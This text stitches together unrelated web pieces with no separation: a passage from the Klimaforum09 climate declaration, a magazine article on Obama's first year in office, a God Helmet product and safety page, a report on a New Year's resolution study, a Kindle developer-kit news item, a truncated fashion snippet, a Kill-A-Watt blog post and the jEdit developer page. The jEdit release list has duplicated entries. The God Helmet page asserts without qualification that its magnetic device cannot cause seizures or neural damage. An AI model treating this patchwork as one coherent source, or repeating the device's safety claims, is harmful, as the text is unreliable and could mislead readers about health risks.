Peasants and Indigenous communities are also being violently displaced from their lands to make way for agro - fuel plantations .
Trillions of dollars are spent on the military - industrial complex , wasting enormous material and human resources , which should instead be devoted to implementing a sustainable transition .
By taking steps forward we can learn by doing .
These steps will help us to convince the broad majority of people that a sustainable transition entails the promise of a more fulfilling and good life .
The social , political , economic and environmental fields are closely interrelated .
A coherent strategy must therefore address them all , which indeed is the central idea behind the concept of sustainable transition .
One aspect of this concept is the restoration of local communities rather than the global market as a basic social , political and economic unit .
Social cohesion , democratic participation , economic accountability and ecological responsibility can only be accomplished by restoring decision making at the lowest appropriate level .
This is a basic lesson we have learned from ethnic cultures and local communities .
A community - based approach does not however contradict the need for extensive international cooperation .
On the contrary , it will need stronger alliances within and across all borders between direct producers in agriculture , forestry , fisheries and industry .
Alliances also built on the strength of gender equality and on recognising and overcoming unjust power relations at all levels .
It also includes the need for stronger regional and international cooperative arrangements to manage common and shared resources such as cross boarder water resources .
Furthermore , international cooperation will promote the full mutual exchange of ideas , technologies and expertise across all boundaries as well as engage in an open - minded dialogue between different cultures based on mutual respect .
5 . Paths to transition
Many people are involved in the practical creation of more sustainable industry , agriculture , forestry and fisheries as well as in the renewable energy sector .
These initiatives within the system have furthermore created alliances with other sectors of society , trade unions , consumers , city dwellers , teachers , researchers all of whom are striving towards sustainable ways of life .
United Nations ( UN ) and Conference of Parties ( COP )
We need to address the UN negotiations on climate change and the 15th Conference of Parties ( COP15 ) on the UN Framework Convention on Climate Change ( UNFCCC ) .
The lessons from previous rounds of negotiations are not very promising .
Despite the high - profile schemes for concerted action launched first in the 1992 Framework Convention on Climate Change of Rio de Janeiro and later in the 1997 Kyoto Protocol , results are meagre and the problems have not been solved .
Indeed , it has worsened as the principles , targets and the timelines of both the convention and the protocol have made little headway .
The same big corporate interests that are largely responsible for causing the climate crisis appear to have immense influence on climate policies at the national and global level .
We strongly oppose this undemocratic influence of corporate lobbyism in the current COP negotiations .
Contrary to this , we call on states to put in place an appraisal mechanism for all policies and policy instruments under the UNFCCC , to ensure inclusive and deliberative multi-stakeholder processes that repair existing inequalities whether based on gender , colour , age , disability or other forms of discrimination in the COP negotiations .
We demand COP15 to reach an agreement that will initiate the restoration of the environmental , social and economic balance of planet Earth by means that are environmentally , socially and economically sustainable and equitable , and finally come up with a legally binding treaty .
Our demands
We are raising our voices to the leaders in the UNFCCC to put forward the people 's demands and alternatives .
1. Phasing out fossil fuel :
We call for a clear strategy for dismantling the fossil fuel era within the next 30 years , which must include specific milestones for every five - year period .
We demand an immediate cut in GHG emissions of industrialised countries of at least 40 % compared to 1990 levels by 2020 .
2. Reparations and compensation for climate debt and crimes :
We demand full reparations for Southern countries and those impoverished by Northern states , TNCs and tax - haven institutions .
By this , we partly address historical injustices associated to inequitable industrialisation and climate change , originating in the genocide of Indigenous nations , the transatlantic slave trade , the colonial era and invasions .
This must be accompanied by an equally clear strategy for compensating impoverished people for the climate and broader ecological debt owed by the enriched .
A global and democratic fund should be established to give direct support to the victims of climate change .
Developed countries must provide new , mandatory , adequate and reliable financing and patent - free technologies to better adapt to adverse climate impacts and undertake emission reductions .
This would allow developing countries to play their part in curbing climate change , while still meeting the needs and aspirations of their people .
International financial institutions , donor agencies and trade mechanisms should have no part in reparations .
3 . An immediate global ban on deforestation of primary forests and the parallel initiation of an ambitious global tree - planting program based on native and diverse species in partnership with Indigenous peoples and forest - dependent communities .
Similarly a ban on large - scale industrialised fishing methods and a return to primarily local and sustainable fishing practices .
Finally , a ban on land grabbing by foreign interests and the full acceptance of people 's sovereignty over natural resources .
4 . We express strong opposition to purely market - oriented and technology - centred false and dangerous solutions put forward by many corporations , governments and international financial institutions .
These include nuclear energy , agro-fuels , carbon capture and storage , Clean Development Mechanisms , biochar , genetically " climate - readied " crops , geoengineering and reducing emissions from deforestation and forest degradation as it is the UNFCCC definition ( REDD ) , which only produce new environmental threats , without really solving the climate crisis .
Carbon trading and offsetting are also false and unjust instruments because they treat a common planetary resource -- the atmosphere -- as a commodity that can be owned and traded .
So far the system has not proven its merits , and by allowing rich countries to offset their reduction obligations , it has maintained this unjust and unsustainable system .
5 . Equitable tax on carbon emissions : Instead of the regime of tradable emission quotas we demand an equitable tax on carbon emissions .
Revenues from this carbon tax should be returned equitably to the people , and a portion should be used to compensate and contribute to finance adaptation and mitigation .
This is , however , not a substitute for repayment of already accumulated climate debt .
This compensation and funding should be unconditional and free of market mechanisms and financial institutions .
Reduction of emissions must be strongly encouraged by a briskly increasing , transparent carbon tax , in addition to direct regulations to drive the phase - out of fossil fuels , while enabling safe , clean and renewable energy .
6. Multilateral institutions and TNCs : Unjust , unsustainable and unaccountable global economic and financial institutions like the WTO , the World Bank , the International Monetary Fund ( IMF ) , regional development banks , donor institutions and trade agreements should be replaced by democratic and equitable institutions functioning in accordance with the United Nations Charter , that respect peoples ' sovereignty over resources and promote solidarity between peoples and nations .
A mechanism for strict surveillance and control of the operations of TNCs should be created as well .
Finally , we commit ourselves to a full and active involvement in carrying our sustainable transitions of our societies along the lines put forward in this declaration .
6 . A global movement for sustainable transition
Irrespective of the outcome of the Copenhagen Summit on Climate Change there is an urgent need to build a global movement of movements dedicated to the long - term task of promoting a sustainable transition of our societies .
Contrary to the prevailing power structures , this movement must grow from the bottom and up .
What is needed is a broad alliance of environmental movements , social movements , trade unions , farmers and other aligned parties that can work together in everyday political struggle on the local as well as national and international level .
Such an alliance entails at the same time the creation of a new mindset and new types of social activisms , and must be capable not only of reacting to unsustainable practices , but also showing by example how a new sustainable economy can indeed function .
We , participating peoples , communities and social organisations at Klimaforum09 are all committed to build on the results achieved at this event in the further development of a global movement of movements .
This declaration aims to inspire the further development of such a movement by pointing to the general direction in which we choose to move .
Together , we can make global transitions to sustainable future .
Join us .
[ This declaration is available in PDF format HERE .
Visit the Klimaforum09 website . ]
AP
FOR some , the magic is undimmed .
Carl Baloney is extravagantly happy that Barack Obama is his president .
He is old enough to remember segregation : back in the 1960s , his local university turned him away because he was black , he says .
He is also old enough to have high blood pressure , which pushes his monthly health - insurance premiums skywards .
Mr Obama plans to bar insurers from turning away the sick .
That will take some of the fear out of life for people like Mr Baloney , who is self - employed and pays his own bills .
Others in his neighbourhood near New Orleans are much worse off , he says : “ Health care is the emergency room .
Next stop is the funeral home . ”
This will change , predicts Mr Baloney , and he is proud that it will change under a black president .
“ I never thought I 'd see it , ” he says , “ and such a sharp president , too . ”
Others feel differently .
“ I 'm neither a Democrat nor a Republican , neither a jackass nor an elephant .
But I would n't vote for a socialist .
Hell , I 'd vote for Adolf Hitler before I 'd vote for Barack Obama .
At least you know what he'd do to you , ” says Ron King , a retired policeman in Stuart , Virginia .
He adds that Mr Obama “ lies all the time ” and is “ dangerous ; he 's trying to change the entire country . ”
Mr King has perhaps not rigorously thought through his Hitler analogy , but his anger is real .
Mr Obama came to power proclaiming an end “ to the petty grievances ... that for far too long have strangled our politics ” and to “ the stale political arguments that have consumed us for so long ” .
By electing him , he said , Americans chose “ unity of purpose over conflict and discord ” .
Alas , this was balderdash .
Abroad , Mr Obama is still loved .
But at home his star is tarnished .
His approval rating has fallen from almost 70 % at the time of his inauguration a year ago to 50 % now .
The proportion of Americans who disapprove of the job he is doing has quadrupled , from 12 % to 44 % .
More than half of voters think the country is on the wrong track , and they are roughly evenly divided as to which of the two parties would do a better job of correcting that .
A poll of polls by RealClearPolitics , a political website , finds that a generic Republican candidate for Congress beats a generic Democrat by 44 % to 41 % .
Mr Obama 's reputation as a miracle - worker was easier to maintain on the stump than in office .
He said he would end the war in Iraq , bring health insurance to all Americans , erect a cap - and - trade system to curb global warming and clean America 's soiled reputation by closing the prison at Guantánamo Bay .
He has not yet done any of these things , though he has made progress in Iraq and is close to signing a health - care bill .
None of this should be surprising .
Governing is hard , especially during an economic crisis .
The American political system is fraught with checks and balances : a president cannot simply tell Congress what to do .
Everything takes time and requires ugly compromises .
Nonetheless , many of Mr Obama 's fans feel let down .
The same technology that Mr Obama used so effectively to promote his candidacy can also be used to highlight his broken promises .
When Democrats opted to hold the final negotiations on the health - care bill in secret , critics immediately posted footage of Mr Obama vowing that such talks would be televised .
Ditto his promise never to hire lobbyists , and to post bills online for five days before he signed them .
Some voters have concluded that he can not be trusted .
Others are outraged at what they see as his march towards European - style socialism .
Anti-tax “ tea party ” protests have swept the country .
Re-energised Republicans crow that they can recapture the House of Representatives this year , and cut the Democrats ' Senate supermajority down to size .
Mr Obama came to power at a time when American - style free - market capitalism was seemingly in disgrace .
Many of his supporters thought he had a mandate to push the country significantly to the left .
But since he took office , public opinion has shifted sharply to the right .
At the beginning of 2008 Americans trusted Democrats over Republicans to deal with the deficit by a whopping 30 percentage - point margin , according to Ipsos - McClatchy .
Now they prefer Republicans by seven points .
On taxes , Democrats led by 17 points , but now trail by two .
On protecting America against terrorists , their nine - point advantage has mutated to a seven - point deficit .
And in areas where Democrats still have the advantage , the gap has narrowed : from 39 points to four on health care , from 21 to five on Iraq and from 44 to 25 on the environment .
Americans have not suddenly fallen in love with Republicans , who seem keener to obstruct Mr Obama than to offer a coherent alternative .
Rather , they are fed up with the recession and government in general .
Since Mr Obama is the public face of power , he gets the blame .
Four cheers for 44
A YouGov Polimetrix poll for The Economist found that Americans disapprove of Mr Obama 's handling of the economy by 54 % to 40 % .
They also frown on his handling of health care ( by 53 % to 40 % ) , terrorism ( 48 % to 42 % ) , immigration ( 49 % to 28 % ) , Afghanistan ( 51 % to 39 % ) , Iraq ( 50 % to 41 % ) , Social Security ( 49 % to 33 % ) and gay rights ( 39 % to 33 % ) .
Of the ten topics mentioned in the poll , he scored a pass mark on only two : education , where he has taken tentative steps to promote autonomous “ charter ” schools and the environment .
In short , Americans still like Mr Obama more than they like his policies , but they are increasingly souring on both .
Yet , by some measures , his first year has been quite successful .
He has made no disastrous mistakes , and can brag of four substantial achievements .
First , he has done wonders for America 's image abroad .
Foreigners warm to his African and Muslim roots , his childhood in Indonesia , his Harvard cosmopolitanism .
He seems less brash , more diplomatic and more respectful of Muslims than his predecessor .
He calls for a world free of nuclear weapons .
He takes a stand against torture .
He talks in complete sentences .
“ [ E ] ngagement with repressive regimes lacks the satisfying purity of indignation , ” he told the Nobel committee .
“ But ...[ n] o repressive regime can move down a new path unless it has the choice of an open door . ”
How much does this matter ?
Simon Anholt , an analyst , heroically estimates the value of the “ Obama effect ” on America 's global brand at $ 2.1 trillion .
Each year , Mr Anholt commissions a poll of 20,000 - 40,000 people to find out how much they admire various countries ' people , culture , exports , governance , human - rights record and so on .
He finds that admiration in one area often translates ( illogically ) into admiration in others .
When George Bush was president , foreigners expressed less positive views of American goods , services and even the landscape .
Under Mr Obama , he finds , America is once again the most admired country in the world ( having slipped to seventh place in 2008 ) .
Using the same tools that consultants use to value brands such as Coca - Cola or Sony , he guesses that the value of “ Brand America ” has risen from $ 9.7 trillion to $ 11.8 trillion .
Writing in Foreign Policy magazine , Mr Anholt calls this “ a pretty good first year ” .
Second , and more concretely , the American economy appears to have stabilised .
The crisis that was raging when Mr Obama was elected has eased .
Carrying on where the previous administration left off , Mr Obama has used gobs of taxpayers ' cash to prop up tottering banks and insurers .
He deserves at least some of the credit for the American financial system not collapsing .
He intervened to rescue two of America 's largest carmakers , General Motors and Chrysler .
He stimulated demand with vast injections of borrowed money .
All this , his supporters say , helped to restore confidence , thereby preventing a painful downturn from turning catastrophic .
Third , Mr Obama has shown he is serious about winning in Afghanistan .
As Iraq grows calmer , Mr Obama is pulling out American troops , as he said he would .
If all goes to plan , only a handful will remain by the end of 2011 .
Meanwhile he is escalating the war in Afghanistan , as he also promised .
By putting tens of thousands more American boots on the ground , he hopes to make the country stable enough to start pulling out by next summer .
Fourth , Mr Obama is close to signing the biggest shake - up of America 's dysfunctional health - care system since the 1960s .
The House and Senate have each passed a bill , and now the two mammoth documents are being haggled into one .
Before long — perhaps before Mr Obama 's state - of - the - union message — health reform will probably become law .
Many details have yet to be finalised , but the outline looks roughly like this .
Every American will be obliged to have health insurance .
Those who cannot afford it will receive subsidies .
States will set up carefully regulated exchanges to make it easier for individuals to shop around for the right policy .
Insurers will be barred from excluding those with pre-existing health problems .
Most of the tens of millions of Americans who currently lack health cover will soon have it , predicts Mr Obama .
And ways will be found to curb costs .
The House bill calls for scores of pilot schemes to find cheaper ways of keeping people healthy .
The Senate version would set up a commission to explore ways of doing it .
The greatest single threat to America 's fiscal solvency — galloping health - care inflation — will thus be tamed .
Mr Obama 's detractors scoff .
So what , they ask , if foreigners applaud him ?
Being liked is no guarantee of being effective .
His Nobel peace prize will hardly make North Korea surrender its nuclear weapons .
His admirers insist that Mr Obama 's patient and tactful style will eventually pay dividends : for example , by persuading Russia to lean on Iran to stop pursuing its own nuclear arsenal .
His critics retort that it has shown few dividends yet .
They think the world 's thugocrats see weakness in Mr Obama , and intend to exploit it .
This is harsh .
Mr Obama has been quicker on the trigger than George Bush when it comes to assassinating terrorist suspects in Pakistan with missiles fired from drones .
He has ordered roughly one such strike a week since taking office , killing some 400 - 500 militants and an unknown number of civilians .
He may have ruffled hawks ' feathers by pushing for terrorists such as Khalid Sheikh Muhammad to be tried in civilian courts , but he has shocked doves , too , by refusing to close the prison at Guantánamo Bay until he figures out what to do with those inside .
Mr Obama 's decision to ramp up the fight in Afghanistan could hurt him politically .
Doves fret that it will be his Vietnam — that a costly , bloody , unwinnable war will derail his presidency .
Hawks gripe that although he made the right decision to send more troops , he dithered for months before making it and then exuded irresolution as he did so .
He said that America “ has no interest in fighting an endless war in Afghanistan ” and will only do “ what can be achieved at a reasonable cost ” .
The Taliban may take that to mean that all they need to prevail is a little patience .
Brickbats and tea-parties
On the economy , Mr Obama 's critics make several points .
Much of his stimulus spending will be wasted , they say , because government spending is always inefficient .
The money he has borrowed will have to be paid back .
Last year 's budget deficit , at an estimated 11.2 % of GDP , was the highest since the second world war .
That is not sustainable .
Mr Obama will presumably address the deficit in his budget next month , but he has not said publicly how he will do so .
Tea -party - goers assume he will raise taxes .
They worry that he plans to shift America to a permanently higher level of public spending and intrusive regulation .
Mr Obama has hired legions of government employees , whose pay and benefits have outpaced those in the private sector .
Although he says he believes in free markets , he does not always act that way .
When Washington bailed out Detroit , politically favoured labour unions fared better than bondholders .
Lobbyists took note .
Conservatives fret that , having spent his life in law , academia and government , Mr Obama knows little about wealth creation .
“ He does n't know anybody who 's ever had a real job , ” grumbles Grover Norquist , an anti-tax activist .
Mr Obama calls himself a free trader , but he slapped tariffs on Chinese tyres last year , provoking swift retaliation .
No full - blown trade war broke out , but America 's reputation has suffered .
Foreigners complained more about America to the World Trade Organisation last year than about any other country bar China , according to Global Trade Alert , a watchdog .
Mr Obama 's proposed health - care reform has attracted brickbats from both left and right .
The left frets that the final bill will probably not include a government - run health insurer ( the “ public option ” ) .
Critics on the right fear that the final goal is socialised medicine , with rationed care and scant rewards for innovators .
Others worry that reform will cost too much .
Both bills call for wasteful spending to be cut , but largely in unspecified ways at some time in the future .
And pitfalls abound .
For example , if the government compels everyone to get health insurance , insurers can fairly easily cope with the requirement that they turn no one away .
But if the fine for not buying insurance is too low , young healthy people may simply opt to pay it .
Many will wait until they are ill to start buying insurance .
So the pool of insured Americans will grow sicker .
Premiums will rise , prompting more healthy people to stop buying insurance .
This is called a “ death spiral ” .
If it happens , either the system will collapse , or the government will have to save it with public money .
Most likely , Congress will be tinkering with health care for years to come .
AP
Still keeping his cool
Mr Obama 's second year could be even tougher .
If and when health reform passes , the Senate will start haggling about climate change .
America 's failure to enact a cap - and - trade system for carbon dioxide earned Mr Obama frowns at the Copenhagen climate summit last month , but carbon pricing is hugely controversial in America , and has become more so since Mr Obama became president .
The House narrowly passed a cap - and - trade bill only by making it much weaker than planned .
Greens hope that , so long as the Senate passes a bill of some kind , it can be tightened later .
But there is no guarantee that it will pass .
Some pundits chide Mr Obama for letting Congress call the shots .
He left it largely up to Nancy Pelosi and Harry Reid , the top Democrats in the House and Senate , to design a health - care plan and decide how stimulus money should be spent .
The results , critics reckon , were more wasteful and less coherent than if Mr Obama had taken charge .
Nobody wanted a health plan written wholly by White House wonks ; but there was a middle ground available , where the president could simply have asserted his will more forcefully over the process .
Mr Obama is trying a more hands - on approach to regulating Wall Street , proposing a stronger role for the Federal Reserve in preventing financial firms from taking risks that imperil the system .
House Democrats agree , but those in the Senate would rather set up a new regulator .
Other looming battles include immigration reform ( see article ) and a bill to allow unions to organise without secret - ballot elections .
Even if rogue states and terrorists are quiet , which is hardly likely , Mr Obama will have a turbulent 2010 .
A Spock or a Clinton ?
Pundits never tire of dissecting the president 's personality .
Is he growing less popular because he is too aloof ?
Maureen Dowd , a liberal columnist , likens him to Mr Spock , the emotionless alien from Star Trek .
Or is it his vanity ?
Conservatives mock his frequent use of the word “ I ” , as in : “ I am well aware of the expectations that accompany my presidency around the world . ”
Such perceptions matter far less , however , than the state of the economy .
The main reason Mr Obama 's polls have slipped is that Americans have spent the past year in fear of losing their jobs .
When the economy recovers , Mr Obama will get the credit .
If no recovery happens , the Republicans may regain the House .
But even that need not be a disaster .
After 1994 , when Bill Clinton had to work with a Republican Congress , he governed from the centre , balancing the budget and signing welfare reform .
And in 1996 he won a second term in the White House .
Thanks are due to the late Dr. Michael Persinger for his extensive help in developing the Shiva God Helmet .
Persinger ’s Endorsement .
The God Helmet ® , part of the Shiva Neural Stimulation System .
The God Helmet is a safe technology , but there are a few basic safety rules .
STAYING SAFE WHILE YOU USE THE GOD HELMET
Do n’t do sessions more than once a week , even if a session ( like sessions that were n’t set up correctly ) had little effect .
After six sessions , stop for 21 days .
SESSION SCHEDULE
Contact us here if you have any questions .
If you ’re ambidextrous , be aware of any unpleasant effects in the second phase of the sessions .
If they occur , stop the session , and begin a one that ends with a different signal .
“ Abort ” the first phase of that session , and move straight to the second phase .
You can also do a session over the frontal lobes to stop the temporal lobe activation God Helmet sessions create .
The signals used in Shiva God Helmet have been extensively tested with both laboratory rats and humans .
The signals are embedded in magnetic fields about as strong as the ones that appear around telephone handsets ( not cell phones ) , or a hair dryer .
These signals can not cause lesions , DNA damage , induce seizures , or any other kind of neural damage .
Signals like these have been in laboratory use ( including monitoring safety issues ) for over twenty years , and have been experienced by thousands of people .
Hundreds of people have used home versions of Shakti without ill - effects just by following the safety rules .
1 ) Do n’t use
The God Helmet at the same time as other mind - machines , including the kind that use flashing lights and / or binaural sounds .
Uncomfortable effects have been reported .
Using complex magnetic devices ( like Shiva ) first , and then another mind machine about an hour to 90 minutes after the end of the session has generated reports where the second device ’s effects were amplified .
2 ) Do n’t use The God Helmet in combination with mind - altering drugs .
Legal psychotropics are more safely combined with Shiva by using them after , and not before or during Shiva sessions .
The use of illegal drugs is not condoned .
3 ) Do n’t use
The God Helmet if you have been diagnosed with a psychiatric disorder , as the effects of Shiva on psychiatric disorders , be they positive , negative or neutral , have not been studied .
Do n’t use Shiva if you have migraine headaches , epilepsy or have a damaged or compromised brain .
The effects of Shiva on these conditions , be they positive , negative , or neutral , have not been studied .
4 ) Do n’t use The God Helmet if you are using psychiatric medications .
The interactions of Shiva with these compounds , be they positive , negative or neutral , have not been studied .
5 ) If a session ( especially in its second phase ) does n’t feel good for you , do n’t repeat it .
6 ) Make sure your coils are set up properly by running the setup session , listening to the signals using a pair of headphones when setting up your hardware .
Set up your The God Helmet system with the coils as shown in the software .
This is for both effectiveness and safety .
7 ) Do n’t experiment with new arrangements for the coils .
8 ) Do n’t use any other kind of coils or replace them with other electronic parts .
9 ) Do n’t do sessions more often than once a week , even if the session had little effect .
This applies to all Shiva sessions , and not just the God Helmet sessions .
10 ) The research that culminated in the development of The God Helmet has also uncovered ways to stop effects created through complex magnetic signal stimulation ( especially those that come from using it too often , in violation of the schedule ) .
Because it ’s easy to do so , a signal is included that will let you do this .
Click here to learn more about this signal .
It ’s not likely that you ’ll need to use it , and it ’s suggested that you contact tech support before doing so .
11 ) Do n’t change sessions each time you use it .
Try each session two or three times before you move on to the next one .
♦♦♦
The Shiva Neural Stimulation System is
$ 649.00 Plus Shipping
( Shipping is $ 20.00 in the USA and $ 40.00 for all other countries )
ORDER SHIVA
INCLUDING THE GOD HELMET HARDWARE AND SOFTWARE
NOTE : The God Helmet is one of the Configurations for The Shiva Neural Stimulation System .
It uses the Shiva God Helmet software .
In the USA , you can order by calling 24/7 ( Toll - Free )
( 855 ) 408-7888
Read the Terms and Conditions before you call .
Legal : Shiva Neural Stimulation signals are based on the God Helmet signal templates licensed by Stan Koren and Dr. Michael A. Persinger .
Shiva does not prevent , diagnose or treat any medical disorders .
Click HERE for a book on The God Helmet Experiments .
Gaia.com article on the God Helmet .
Note : God Helmet is a registered trademark
The USPTO has given the THE GOD HELMET trademark serial number of 85799845 .
.
.
.
Many of the 78 % who fail in their plans are focusing on downside of not achieving goals , research finds
It 's part of the new year ritual – an annual attempt to start afresh and turn over a new leaf .
But making resolutions is a near pointless exercise , psychologists say .
We break them , become dispirited in the process and finally more despondent than we were before .
Less than a quarter of those asked for a university study had managed to stick to their resolutions .
Of those who failed , many had followed the spurious advice of self - help gurus – which almost guarantees disaster , apparently .
Richard Wiseman , a psychologist at the University of Hertfordshire , who led the analysis , said he and his team had asked 700 people about their strategies for achieving new year resolutions .
Their goals ranged from losing weight or giving up smoking to gaining a qualification or starting a better relationship .
Of the 78 % who failed , many had focused on the downside of not achieving the goals ; they had suppressed their cravings , fantasised about being successful , and adopted a role model or relied on willpower alone .
" Many of these ideas are frequently recommended by self - help experts but our results suggest that they simply do n't work , " Wiseman said .
" If you are trying to lose weight , it 's not enough to stick a picture of a model on your fridge or fantasise about being slimmer . "
On the other hand , people who kept their resolutions tended to have broken their goal into smaller steps and rewarded themselves when they achieved one of these .
They also told their friends about their goals , focused on the benefits of success and kept a diary of their progress .
People who planned a series of smaller goals had an average success rate of 35 % , while those who followed all five of the above strategies had a 50 % chance of success , the study found .
" Many of the most successful techniques involve making a plan and helping yourself stick to it , " Wiseman said .
Making new year resolutions at the last minute can backfire , he warned , because such decisions tend to be less genuinely motivated .
" If you do it on the spur of the moment , it probably does n't mean that much to you and you wo n't give it your all .
Failing to achieve your ambitions is often psychologically harmful because it can rob people of a sense of self control . "
Other strategies that helped people to achieve their goals included making only one resolution at a time and treating occasional lapses in the plan as just temporary setbacks .
As Motoko Rich and I report in Wednesday ’s New York Times , Amazon.com is finally opening up the Kindle to developers .
This has the potential to turn a popular single - purpose device into a more interesting and versatile gadget , limited only by the imagination of third - party programmers — and by what they can do with its monochrome e-ink screen .
/ Ben Margot / Associated Press
Amazon says it has already released the Kindle Development Kit to a select number of partners , including the video game giant Electronic Arts , and will make it more widely available when a limited beta period starts next month .
It anticipates formally adding what it calls “ active content ” to the Kindle store sometime later this year .
Ian Freed , Amazon ’s vice president for the Kindle , said there would be three different categories of active content : free applications , one - time paid applications , and applications that require a monthly subscription .
Kindles that have already been sold will be able to run these programs once Amazon has remotely upgraded their software .
Developers will get to suggest their own prices for their programs , but they will have to shoulder the cost of wireless delivery at a rate of 15 cents a megabyte .
After those costs are covered , developers keep 70 percent of the revenue from the sale of the app , while Amazon keeps 30 percent .
( Remember that unlike smartphones , the Kindle does not require a monthly wireless fee . )
How actively will Amazon police what makes it into the Kindle store ?
“ The guidelines are what you might expect , ” said Drew Herdener , an Amazon spokesman .
On the forbidden list : Internet voice - calling software , advertising , offensive materials , the collecting of customer information without consent , and the use of the Amazon and Kindle brands .
One company that ’s had access to the Kindle development kit is Handmark , based in Kansas City , Mo. , which brings Zagat restaurant guides to mobile devices .
Handmark is creating a version of the guides for the Kindle , said Paul Reddick , its chief executive .
The book will , among other things , be searchable ( type in “ Italian restaurant , ” “ New York , ” and kid- friendly , ” and get the relevant restaurants ) , and will allow people to type in a ZIP code and find restaurants in their area .
Mr. Reddick said he did not think the drawbacks of e-ink – monochrome screens , minimal graphics support – would necessarily limit the variety of applications available for the Kindle : “ If you are trying to play some twitch game it might be a limitation .
But for Zagat , it ’s a really good fit . ”
The day after French designer Isabel Marant unveiled her Fall / Winter 2009 collection in Paris in March , the Web sites for boutiques across the U.S. were flooded with emails about studded ankle - high boots , asking when they would be arriving and whether they could be ordered in advance .
Monika Beurmann , a 35 - year - old IT consultant from Chicago , says that while looking at the fashion show on Style.com , she " fell in love with the futuristic design of the heel , " and pr e-ordered ...
I ’ve always imagined getting an itemized electric bill .
We ’re not there yet , but when I saw a Kill - A - Watt at Radio Shack last night I remembered the discussion thread at this 2007 blog post and impulsively bought it .
In a way I ’m glad I waited until 2009 because a companion tool is available now that was n’t then : WolframAlpha .
Its fluency with units , conversions , and comparisons is really helpful if , like me , you ca n’t do that stuff quickly and easily in your head .
So , for example , I ’m sitting at my desk with the Kill - A - Watt watching my main power strip .
I have a mixer here that I use about an hour a week for podcast recording .
There ’s no power switch because , well , why bother , just leave it on , it ’s a tiny draw .
Negligible .
I reach over and unplug it .
Now I ’m drawing 9 fewer watts .
But what does that mean ?
I consult Wolfram Alpha :
Q: 9 W A : About half the power expended by the human brain .
On a monthly basis ?
Q: 9 W * ( 30 * 24 hours )
A : About half the energy released by combustion of one kilogram of gasoline .
In gallons ?
Q : ( 1 kilogram / density of gasoline ) / 2 A : Less than a fifth of a gallon .
Relative to my electric usage , which was 1291 kWh last month ?
In dollars ?
I find these comparisons really helpful .
A dollar a month is a rounding error .
But if I think of it as the energy equivalent of driving my car 7.2 miles , that makes me want to reach over and unplug the mixer for the 715 hours per month I ’m not using it .
Saul Griffith has internalized these calculations , but most of us need help .
A next - gen Kill - A - Watt that did these sorts of conversions and comparisons could be a real behavior changer .
jEdit Development
Developers , you 'll want to bookmark this page .
Handy Links / TOC
Release Schedule
A new " point " release of jEdit is scheduled to come out every year or so .
A " pre " is released a few months before that to allow for testing , updating international strings , and other general kinds of polishing off , although translators are encouraged to test the latest daily builds .
jEdit 4.3pre9 : January 20 2007
: January 20 2007 jEdit 4.3pre10 : July 15 2007
: July 15 2007 jEdit 4.3pre11 : October 04 2007
: October 04 2007 jEdit 4.3pre12 : December 08 2007
: December 08 2007 jEdit 4.3pre13 : March 13 2008
: March 13 2008 jEdit 4.3pre14 : April 27 2008
: April 27 2008 jEdit 4.3pre15 : August 10 2008
: August 10 2008 jEdit 4.3pre16 : November 19 2008
: November 19 2008 jEdit 4.3pre17 : July 05 2009
: July 05 2009 jEdit 4.3pre18 : November 07 2009
: November 07 2009 jEdit 4.3 : December 23 2009
: December 23 2009 jEdit 4.3.1 : January 28 2010
: January 28 2010 jEdit 4.3.2 : May 09 2010
: May 09 2010 jEdit 4.4pre1 : February 03 2011
: February 03 2011 jEdit 4.3.3 : June 21 2011
: June 21 2011 jEdit 4.4.1 : June 21 2011
: June 21 2011 jEdit 4.4.2 : October 14 2011
: October 14 2011 jEdit 4.5 pre1 : November 19 2011
: November 19 2011 jEdit 4.5.0 : January 31 2012
: January 31 2012 jEdit 4.5.1 : March 27 2012
: March 27 2012 jEdit 4.5.2 : June 16 2012
: June 16 2012 jEdit 5.0 pre1 : June 10 2012
: June 10 2012 jEdit 5.0.0 : November 22 2012
: November 22 2012 jEdit 5.1 pre1 : May 24 2013
: May 24 2013 jEdit 5.1.0 : July 28 2013
: July 28 2013 jEdit 5.2pre1 : May 27 , 2014
: May 27 , 2014 jEdit 5.2.0 : February 5 , 2015
: February 5 , 2015 jEdit 5.3.0 : October 22 , 2015
: October 22 , 2015 jEdit 5.4.0 : March 18 , 2017
: March 18 , 2017 jEdit 5.5.0 : April 10 , 2018
: April 10 , 2018 jEdit 5.6.0 : September 03 , 2020
Want to join us ?
Help Wanted !
Becoming a jEdit developer
j Edit is always looking for more people to help .
If you examine the Feature Requests and open Bugs , you will see that many of them are " unassigned " .
Most of our code is managed using an open - source tool called Subversion .
It is recommended you learn the basics of this tool , to help you keep up to date on the latest changes from other developers , as well as to generate patches against specific file revisions .
Slava is no longer actively involved in development , and many other plugin authors have also left the community and are not maintaining their plugins .
Some plugins have a new maintainer , others have been replaced by newer plugins .
Once you become a developer , we can always use help by closing some of these open issues .
You can make comments on them , or if you want to assign yourself tracker items , feel free .
Inclusion in the jEdit " development team " is informal and open to anyone .
You can " join " simply by subscribing to the jEdit - devel and jEdit - users mailing lists .
Your level and focus of involvement is entirely up to you .
For active developers , it is also highly recommended you join jedit - commits which includes commit logs on the subversion repository .
Watching this list allows you to see clearly who are the active developers , and precisely what they are working on .
Membership in the jEdit SourceForge project is granted on an as - needed basis .
If you join the jEdit mailing lists , participate , and end up working on one or more plugins ( either your own , or existing ones ) , then you can ask one of the administrators of the project for access to the GIT or SVN repository .
If you still find yourself with inadquate permissions to do your work , ask one of the project administrators for the permissions you need .
This includes access to statistics , databases , etc .
Specific contributions
Are you a Drupal expert ?
jEdit 's community site is far out of date and needs some love .
If you are a Drupal developer and do n't mind the challenge of upgrading a 15 + year old system , that would be much appreciated !
Please ask to join or even administer the jEdit community project .
Localization files
Now that jEdit supports localization , it is easy to add a translation file for jEdit or any of the plugins for any other language .
If you want to submit translation files to jEdit , or update existing ones , you can submit patches to the proper patches tracker or ask for commit permissions if you plan to do a lot of them .
Writing / updating edit modes
Writing syntax highlighting modes is covered in detail in the jEdit user 's guide .
If you want your mode to be included with jEdit , send it along with a mode catalog entry , and an attached example file ( for exotic languages ) containing a code snippet in that language for testing , to the jedit patches tracker .
Writing macros
Macro development is covered in the jEdit user 's guide .
Macros should only be used for simple tasks ; more complicated features should be coded as plugins .
If you want your macro to be included with jEdit , send it to jedit - devel or the jedit patches tracker .
Writing plugins
Plugin development is covered in the jEdit user 's guide , but the information there only scratches the surface , since plugins can do anything any Java program can .
You can learn more by looking at the sourcecode of another plugin which does something similar to what you want .
Once your plugin is in a minimally useful state , send a message to the jEdit - users mailing list with a short summary of your plugin , and possibly a download link .
Remember to release early and often - feedback at early stages of development is always a good thing .
